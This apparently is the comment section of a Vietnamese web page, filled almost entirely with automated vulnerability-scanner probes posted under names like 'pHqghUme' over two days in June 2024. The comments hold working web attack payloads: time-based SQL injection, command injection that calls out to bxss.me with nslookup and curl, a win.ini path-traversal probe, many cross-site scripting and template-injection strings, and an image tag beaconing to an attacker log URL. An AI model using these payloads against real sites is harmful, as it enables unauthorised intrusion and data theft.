1

image
pHqghUme
24/06/2024

if(now()=sysdate(),sleep(15),0)

image
pHqghUme
24/06/2024

echo fvcctb$()\ solbdm\nz^xyu||a #' &echo fvcctb$()\ solbdm\nz^xyu||a #|" &echo fvcctb$()\ solbdm\nz^xyu||a #

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
pHqghUme
24/06/2024

1&echo qsghri$()\ xwkgum\nz^xyu||a #' &echo qsghri$()\ xwkgum\nz^xyu||a #|" &echo qsghri$()\ xwkgum\nz^xyu||a #

image
pHqghUme
24/06/2024

c:/windows/win.ini

image
pHqghUme
24/06/2024

!(()&&!|*|*|

image
pHqghUme
24/06/2024

'.gethostbyname(lc('hittj'.'mysbcrtjae5f2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(88).chr(121).chr(74).'

image
pHqghUme
24/06/2024

1

image
'.gethostbyname(lc('hithy'.'ukgxzjxg413f2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(79).chr(107).chr(85).'
24/06/2024

1

image
pHqghUme
24/06/2024

|(nslookup -q=cname hitvzvrouwrqqb6734.bxss.me||curl hitvzvrouwrqqb6734.bxss.me)

image
pHqghUme
24/06/2024

;(nslookup -q=cname hitqadxyutlev4d3d1.bxss.me||curl hitqadxyutlev4d3d1.bxss.me)|(nslookup -q=cname hitqadxyutlev4d3d1.bxss.me||curl hitqadxyutlev4d3d1.bxss.me)&(nslookup -q=cname hitqadxyutlev4d3d1.bxss.me||curl hitqadxyutlev4d3d1.bxss.me)

image
'+'A'.concat(70-3).concat(22*4).concat(113).concat(78).concat(105).concat(78)+(require'socket' Socket.gethostbyname('hitbc'+'djmbrkio14bb4.bxss.me.')[3].to_s)+'
24/06/2024

1

image
bxss.me/t/xss.html?%00
24/06/2024

1

image
pHqghUme
24/06/2024

${@print(md5(31337))}\

image
pHqghUme
24/06/2024

-1)); waitfor delay '0:0:15' --

image
pHqghUme
24/06/2024

-5) OR 26=(SELECT 26 FROM PG_SLEEP(15))--

image
comment
24/06/2024

1

image
pHqghUme
24/06/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
pHqghUme
24/06/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
pHqghUme
24/06/2024

1<aLedXwS<

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
24/06/2024

1

image
pHqghUme
24/06/2024

<th:t="${dfb}#foreach

image
743XRvfT'); waitfor delay '0:0:15' --
24/06/2024

1

image
9kOZmspO')) OR 122=(SELECT 122 FROM PG_SLEEP(15))--
24/06/2024

1

image
bfg3435<s1﹥s2ʺs3ʹhjl3435
24/06/2024

1

image
<%={{={@{#{${dfb}}%>
24/06/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
24/06/2024

1

image
dfb__${98991*97996}__::.x
24/06/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
24/06/2024

1

image
<%={{={@{#{${dfb}}%>
24/06/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
dfb{{98991*97996}}xca
24/06/2024

1

image
dfb__${98991*97996}__::.x
24/06/2024

1

image
dfb__${98991*97996}__::.x
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
%70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%62%72%72%43%289581%29%3C%2F%73%43%72%69%70%54%3E
24/06/2024

1

image
pHqghUme<img sRc='http://attacker-9145/log.php?
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
GRLpGpAG
24/06/2024

1'"()&%<zzz><ScRiPt >RpdL(9156)</ScRiPt>

image
pHqghUme
24/06/2024

'"()&%<zzz><ScRiPt >3s7V(9960)</ScRiPt>

image
pHqghUme
24/06/2024

dfb[[${98991*97996}]]xca

image
pHqghUme
24/06/2024

1<ScR<ScRiPt>IpT>3s7V(9467)</sCr<ScRiPt>IpT>

image
pHqghUme
24/06/2024

19721280

image
pHqghUme
24/06/2024

1'"()&%<zzz><ScRiPt >Tbg2(9750)</ScRiPt>

image
pHqghUme'"()&%<zzz><ScRiPt >ueKY(9916)</ScRiPt>
24/06/2024

1

image
'"()&%<zzz><ScRiPt >ueKY(9894)</ScRiPt>
24/06/2024

1

image
bfg7597<s1﹥s2ʺs3ʹhjl7597
24/06/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
24/06/2024

1

image
pHqghUme<ScRiPt >ueKY(9860)</ScRiPt>
24/06/2024

1

image
pHqghUme<script>ueKY(9427)</script>
24/06/2024

1

image
pHqghUme<ScR<ScRiPt>IpT>ueKY(9883)</sCr<ScRiPt>IpT>
24/06/2024

1

image
pHqghUme<body onload=ueKY(9069)>
24/06/2024

1

image
%70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%75%65%4B%59%289143%29%3C%2F%73%43%72%69%70%54%3E
24/06/2024

1

image
pHqghUme}body{zzz:Expre/**/SSion(ueKY(9184))}
24/06/2024

1

image
pHqghUme0F5Zz <ScRiPt >ueKY(9821)</ScRiPt>
24/06/2024

1

image
pHqghUme<W3HCSI>FRDBA[!+!]</W3HCSI>
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme'"()&%<zzz><ScRiPt >NvEc(9656)</ScRiPt>
25/06/2024

1

image
'"()&%<zzz><ScRiPt >NvEc(9892)</ScRiPt>
25/06/2024

1

image
pHqghUme
25/06/2024

1'"()&%<zzz><ScRiPt >ECem(9918)</ScRiPt>

image
pHqghUme
25/06/2024

'"()&%<zzz><ScRiPt >ECem(9050)</ScRiPt>

Bình luận bài viết